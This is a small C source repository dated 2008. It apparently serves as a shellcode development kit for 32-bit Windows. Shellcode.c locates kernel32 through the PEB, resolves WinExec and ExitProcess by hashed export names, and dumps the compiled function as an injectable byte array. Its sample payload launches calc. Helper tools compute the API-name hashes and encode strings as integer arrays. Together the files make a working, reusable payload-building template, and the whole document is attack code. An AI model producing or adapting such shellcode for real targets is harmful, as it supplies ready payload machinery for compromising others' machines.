├── tools
    ├── gethash.c
    └── str2intarr.c
└── Shellcode.c


/tools/gethash.c:
--------------------------------------------------------------------------------
 1 | //-------------------------------------------------------------------------
 2 | // Calculate the hash of the API name.
 3 | //
 4 | // C:\CSC\tools> gethash.exe WinExec
 5 | // #define HASH_WinExec                        0x25e6b913
 6 | //
 7 | // tombkeeper@gmail.com
 8 | // 2008.05
 9 | //-------------------------------------------------------------------------
10 | 
11 | 
12 | #include <windows.h>
13 | 
14 | DWORD HashKey(char *key)
15 | {
16 |     DWORD nHash = 0;
17 |     while (*key)
18 |     {
19 |         nHash = (nHash<<5) + nHash + *key++;
20 |     }
21 |     return nHash;
22 | }
23 | 
24 | int main(int argc, char *argv[])
25 | {
26 |     if (argc != 2)
27 |     {
28 |         printf ( "Usage: %s <API Name>\n", argv[0] );
29 |     }else
30 |     {
31 |         printf ( "#define HASH_%-30s %0#.8x\n", argv[1], HashKey(argv[1]) );
32 |     }
33 |     return 0;
34 | }
35 | 


--------------------------------------------------------------------------------
/tools/str2intarr.c:
--------------------------------------------------------------------------------
 1 | //-------------------------------------------------------------------------
 2 | // Converting string to an integer array.
 3 | //
 4 | // C:\CSC\tools> str2intarr.exe AAAABBBB
 5 | // DWORD sz_String[] = { 0x41414141, 0x42424242, 0x00000000 };
 6 | //
 7 | // tombkeeper@gmail.com
 8 | // 2008.05
 9 | //-------------------------------------------------------------------------
10 | 
11 | 
12 | #include<Windows.h>
13 | 
14 | int main( int argc, char * argv[] )
15 | {
16 | 
17 |     if ( argc != 2 )
18 |     {
19 |         printf("Usage: %s <String>", argv[0] );
20 |         exit(0);
21 |     }else
22 |     {
23 |         DWORD Num, i, Len, *IntBlock;
24 | 
25 |         Len = strlen(argv[1]);
26 |         Num = Len/sizeof(DWORD)+1; 
27 |         IntBlock = calloc( Num, sizeof(DWORD) );
28 | 
29 |         if ( IntBlock==NULL )
30 |         {
31 |             printf( "Can't allocate memory\n" );
32 |             exit(0);
33 |         }
34 |         else 
35 |         {
36 |             strncpy( (char *)IntBlock, argv[1], Num*sizeof(DWORD) );
37 |             
38 |             if (Num > 4)
39 |             {
40 |                 printf( "DWORD sz_String[] =\n{" );
41 |                 for( i=0; i<Num; i++)
42 |                 {
43 |                     if ( !(i%6) )
44 |                     {
45 |                         printf("\n    ");
46 |                     }
47 |                     printf( "0x%.8x", IntBlock[i] );
48 |                     if ( i != Num-1 )
49 |                     {
50 |                         printf(", ");
51 |                     }
52 |     
53 |                 }
54 |                 printf( "\n};" );
55 |             }
56 |             else
57 |             {
58 |                 printf( "DWORD sz_String[] = { " );
59 |                 for( i=0; i<Num; i++)
60 |                 {
61 |                     printf( "0x%.8x", IntBlock[i] );
62 |                     if ( i != Num-1 )   printf(", ");
63 |                 }
64 |                 printf( " };\n" );
65 |             }
66 | 
67 |             free(IntBlock);
68 |         }
69 |     }
70 | }
71 | 


--------------------------------------------------------------------------------
/Shellcode.c:
--------------------------------------------------------------------------------
  1 | //-------------------------------------------------------------------------
  2 | // Shellcode Template in C
  3 | //
  4 | // Compile with VC 6:
  5 | // C:\CSC> cl.exe -MD -O1 Shellcode.c
  6 | // 
  7 | // tombkeeper@gmail.com
  8 | // 2008.05
  9 | //-------------------------------------------------------------------------
 10 | 
 11 | #include <winsock2.h>
 12 | #include <windows.h>
 13 | #include <stdlib.h>
 14 | #include <stdio.h>
 15 | #include <fcntl.h>
 16 | #pragma comment( lib, "Kernel32.lib" )
 17 | #pragma comment( linker,"/ENTRY:main" )
 18 | #pragma comment( linker, "/ALIGN:4096" )
 19 | #pragma data_seg( ".text" )
 20 | #pragma const_seg( ".text" )
 21 | 
 22 | typedef  void * ( __stdcall * WinAPIPtr )();
 23 | typedef  void * ( __cdecl * CFuncPtr )();
 24 | //-------------------------------------------------------------------------
 25 | #define HASH_WinExec                    0x25e6b913
 26 | #define HASH_ExitProcess                0xcbff6bb9
 27 | struct KERNEL32
 28 | {
 29 |     PVOID BaseAddr;
 30 |     WinAPIPtr WinExec;
 31 |     WinAPIPtr ExitProcess;
 32 | };
 33 | 
 34 | void* GetProcAddrByHash( PVOID LibBaseAddr, DWORD FnHash );
 35 | PVOID GetKernel32Base(void);
 36 | 
 37 | //-------------------------------------------------------------------------
 38 | void __declspec(naked) StartSign (){}
 39 | //-------------------------------------------------------------------------
 40 | 
 41 | void ShellCode(void)
 42 | {
 43 |     struct  KERNEL32    Kernel32;
 44 |     DWORD   sz_String[] = { 0x636c6163, 0x00000000 };
 45 | 
 46 |     Kernel32.BaseAddr = GetKernel32Base();
 47 | 
 48 |     Kernel32.ExitProcess = GetProcAddrByHash( Kernel32.BaseAddr, HASH_ExitProcess);
 49 |     Kernel32.WinExec = GetProcAddrByHash( Kernel32.BaseAddr, HASH_WinExec);
 50 | 
 51 |     Kernel32.WinExec( sz_String, SW_SHOWNORMAL );
 52 |     Kernel32.ExitProcess(0);
 53 | }
 54 | 
 55 | //-------------------------------------------------------------------------
 56 | #pragma pack(8)
 57 | 
 58 | struct _ACTIVATION_CONTEXT;
 59 | 
 60 | typedef struct _UNICODE_STRING {
 61 |     USHORT Length;
 62 |     USHORT MaximumLength;
 63 |     PWSTR  Buffer;
 64 | } UNICODE_STRING;
 65 | 
 66 | typedef struct _LDR_DATA_TABLE_ENTRY {
 67 |     LIST_ENTRY InLoadOrderLinks;
 68 |     LIST_ENTRY InMemoryOrderLinks;
 69 |     LIST_ENTRY InInitializationOrderLinks;
 70 |     PVOID DllBase;
 71 |     PVOID EntryPoint;
 72 |     ULONG SizeOfImage;
 73 |     UNICODE_STRING FullDllName;
 74 |     UNICODE_STRING BaseDllName;
 75 |     ULONG Flags;
 76 |     USHORT LoadCount;
 77 |     USHORT TlsIndex;
 78 |     union {
 79 |         LIST_ENTRY HashLinks;
 80 |         struct {
 81 |             PVOID SectionPointer;
 82 |             ULONG CheckSum;
 83 |         };
 84 |     };
 85 |     union {
 86 |         struct {
 87 |             ULONG TimeDateStamp;
 88 |         };
 89 |         struct {
 90 |             PVOID LoadedImports;
 91 |         };
 92 |     };
 93 |     struct _ACTIVATION_CONTEXT * EntryPointActivationContext;
 94 | 
 95 |     PVOID PatchInformation;
 96 | 
 97 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
 98 | 
 99 | typedef struct EB_LDR_DATA {
100 |     ULONG Length;
101 |     BOOLEAN Initialized;
102 |     HANDLE SsHandle;
103 |     LIST_ENTRY InLoadOrderModuleList;
104 |     LIST_ENTRY InMemoryOrderModuleList;
105 |     LIST_ENTRY InInitializationOrderModuleList;
106 |     PVOID EntryInProgress;
107 | } PEB_LDR_DATA, *PPEB_LDR_DATA;
108 | 
109 | typedef struct EB_HEAD {
110 |     BOOLEAN InheritedAddressSpace;
111 |     BOOLEAN ReadImageFileExecOptions;
112 |     BOOLEAN BeingDebugged;
113 |     union {
114 |         BOOLEAN BitField;
115 |         struct {
116 |             BOOLEAN ImageUsesLargePages : 1;
117 |             BOOLEAN SpareBits : 7;
118 |          };
119 |     };
120 |     HANDLE Mutant;
121 |     PVOID  ImageBaseAddress;
122 |     PPEB_LDR_DATA Ldr;
123 | } PEB_HEAD, * PPEB_HEAD;
124 | 
125 | //-------------------------------------------------------------------------
126 | __forceinline DWORD GetCurrentTeb(void)
127 | {
128 |     __asm mov eax, fs:[0x18]
129 | }
130 | 
131 | __forceinline DWORD GetCurrentPeb(void)
132 | {
133 |     return *(DWORD*)( GetCurrentTeb()+0x30 );
134 | }
135 | 
136 | PVOID GetKernel32Base(void)
137 | {
138 |     PPEB_HEAD pPEB = (PPEB_HEAD)GetCurrentPeb();
139 |     PLIST_ENTRY pListHead = pPEB->Ldr->InInitializationOrderModuleList.Flink;
140 |     PLDR_DATA_TABLE_ENTRY pLDR_DATA_TABLE_ENTRY;
141 |     int i;
142 |     for( i = 0; i < 2; i++ )
143 |     {
144 |         pLDR_DATA_TABLE_ENTRY = CONTAINING_RECORD ( 
145 |             pListHead->Flink, LDR_DATA_TABLE_ENTRY, InInitializationOrderLinks
146 |         );
147 |         if( pLDR_DATA_TABLE_ENTRY->BaseDllName.Buffer[8] == 0x002E ) break;
148 |         pListHead = pListHead->Flink;
149 |     }
150 |     return pLDR_DATA_TABLE_ENTRY->DllBase;
151 | }
152 | 
153 | //-------------------------------------------------------------------------
154 | __forceinline DWORD HashKey(char *key)
155 | {
156 |     DWORD nHash = 0;
157 |     while (*key)
158 |     {
159 |         nHash = (nHash<<5) + nHash + *key++;
160 |     }
161 |     return nHash;
162 | }
163 | 
164 | void* GetProcAddrByHash( PVOID LibBaseAddr, DWORD FnHash )
165 | {
166 |     DWORD *pNameBase;
167 |     void* Function;
168 |     int Ordinals;
169 |     PIMAGE_DOS_HEADER pDos;
170 |     PIMAGE_NT_HEADERS pNT;
171 |     PIMAGE_EXPORT_DIRECTORY pExport;
172 |     BOOL Found = FALSE;
173 | 
174 |     pDos = ( PIMAGE_DOS_HEADER )LibBaseAddr;
175 |     pNT = ( PIMAGE_NT_HEADERS )( (DWORD)LibBaseAddr+(DWORD)pDos->e_lfanew );
176 |     pExport=( PIMAGE_EXPORT_DIRECTORY )( (DWORD)LibBaseAddr+pNT->OptionalHeader.DataDirectory[0].VirtualAddress );
177 |     pNameBase=( DWORD* )( (DWORD)LibBaseAddr+pExport->AddressOfNames );
178 |     for (Ordinals = 0; Ordinals < pExport->NumberOfNames; Ordinals++)
179 |     {
180 |         char *pName=(char*)LibBaseAddr+*pNameBase;
181 |         if( HashKey(pName) == FnHash )
182 |         {
183 |             Found = TRUE;
184 |             break;
185 |         }
186 |         pNameBase++;
187 |     }
188 |     if( Found )
189 |     {
190 |         WORD Index;
191 |         Index = ( (WORD*)( (DWORD)LibBaseAddr+pExport->AddressOfNameOrdinals) )[Ordinals];
192 |         Function = (void *)( (DWORD)LibBaseAddr+((DWORD*)((DWORD)LibBaseAddr+pExport->AddressOfFunctions))[Index] );
193 |         return Function;
194 |     }
195 |     return NULL;
196 | }
197 | 
198 | //-------------------------------------------------------------------------
199 | void __declspec(naked) EndSign (){}
200 | //-------------------------------------------------------------------------
201 | 
202 | void ShellCodeToHex
203 | (
204 |     BYTE *ShellCode,
205 |     DWORD ShellCodeSize,
206 |     FILE *stream
207 | )
208 | {
209 |     char Head[] = "BYTE ShellCode[] = {";
210 |     char Tail[] = "};\n";
211 |     int i;
212 | 
213 |     fprintf( stream, Head );
214 |     for( i=0; i<ShellCodeSize; i++ )
215 |     {
216 |         if ( (i%16)==0 )   // 16 bytes per line
217 |         {
218 |             fprintf( stream, "%s    ", "\n" );
219 |         }
220 |         if ( i != (ShellCodeSize-1) )
221 |         {
222 |             fprintf( stream, "0x%.2X,", ShellCode[i] );
223 |         }
224 |         else
225 |         {
226 |             fprintf( stream, "0x%.2X", ShellCode[i] );
227 |             fprintf( stream, "%s", "\n" );
228 |         }
229 |     }
230 |     fprintf( stream, Tail );
231 |     fprintf( stream, "DWORD ShellCodeSize = %d;\n", ShellCodeSize );
232 | }
233 | 
234 | void main(void)
235 | {
236 |     DWORD ShellCodeSize;
237 | 
238 |     ShellCodeSize = (DWORD)EndSign - (DWORD)StartSign;
239 |     ShellCodeToHex ( (BYTE *)ShellCode, ShellCodeSize, stdout );
240 |     // ShellCode();
241 | }
242 | 
243 | 


--------------------------------------------------------------------------------